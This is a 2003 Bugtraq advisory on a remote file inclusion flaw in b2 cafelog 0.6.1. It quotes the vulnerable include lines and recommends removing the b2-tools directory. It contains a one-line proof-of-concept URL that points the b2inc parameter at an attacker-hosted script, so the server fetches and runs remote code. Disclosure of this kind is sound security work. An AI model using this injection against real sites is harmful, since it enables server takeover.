Bugtraq mailing list archives
b2 cafelog 0.6.1 remote command execution.
From: pokleyzz <pokleyzz () scan-associates net>
Date: Thu, 29 May 2003 15:22:38 +0800
Products: b2 cafelog 0.6.1 (http://cafelog.com/) Date: 29 May 2003 Author: pokleyzz <pokleyzz_at_scan-associates.net> Contributors: sk_at_scan-associates.net shaharil_at_scan-associates.net munir_at_scan-associates.net URL: http://www.scan-associates.net Summary: b2 cafelog 0.6.1 remote command execution. Description =========== b2 cafelog is blogger system written in php with mysql ad database backend. Details =======b2 cafelog 0.6.1 come with directory b2-tools. This directory contain 2 php scripts
(blogger-2-b2.php and gm-2-b2.php) which allow user to specify $b2inc and do remote code injection.from blogger-2-b2.php line 21 -----------------------------------------------------
case "step1": include("b2config.php"); include("$b2inc/b2functions.php"); include("$b2inc/b2vars.php"); ------------------------------------------------------------------------------------from gm-2-b2.php line 5 ----------------------------------------------------------
// 3. load in the browser from there include("b2config.php"); include($b2inc."/b2functions.php"); ----------------------------------------------------------------------------------- Proof of concept =========== http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com attacker.com have file named b2functions.php with php script you want to execute. Workaround ========= Remove b2-tools directory. Vendor Response =============== Vendor has been contacted on 19/05/2003 but to reply given.
Current thread:
- b2 cafelog 0.6.1 remote command execution. pokleyzz (May 29)